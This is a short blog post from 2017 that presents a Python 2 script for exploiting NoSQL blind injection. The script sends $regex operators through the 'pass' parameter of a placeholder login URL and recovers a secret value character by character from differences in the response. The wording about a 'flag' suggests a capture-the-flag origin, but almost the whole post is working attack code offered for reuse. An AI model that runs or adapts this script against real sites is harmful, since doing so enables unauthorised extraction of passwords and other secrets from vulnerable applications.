2017-01-30 scripts No-SQL-Blind Injection script ! Here is a little script to exploit nosql blind injections 1234567891011121314151617181920212223242526272829303132333435#!/usr/bin/env python2import urllib2import timedef checkIfGood(param): response = urllib2.urlopen("http://www.vulnerable-site.com/index.php?name=user&pass[$regex]=" + param).read() print "[^]Trying " + param time.sleep(0.1) if response.find("This is not a valid flag") == -1: return (0) return (1) CHARSET = "0123456789azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN@-_."def main(): i = 0 tmp = "" while i < len(CHARSET): tmp += CHARSET[i] if checkIfGood(tmp + '.' + '{' + str(21 - len(tmp)) + '}') == 1: # 21 = len(nb_chars) tmp = tmp[:-1] else: i = -1 i = i + 1 def check_nb_chars(): i = 0 while i < 100: if checkIfGood(".{" + str(i) + "}") == 0: print "OK : " + str(i) i = i + 1#check_nb_chars()main() Récent Setting up prod ready applications with traefik v2.X, Docker swarm and Let's encrypt. Ancien SQL-Blind Injection script !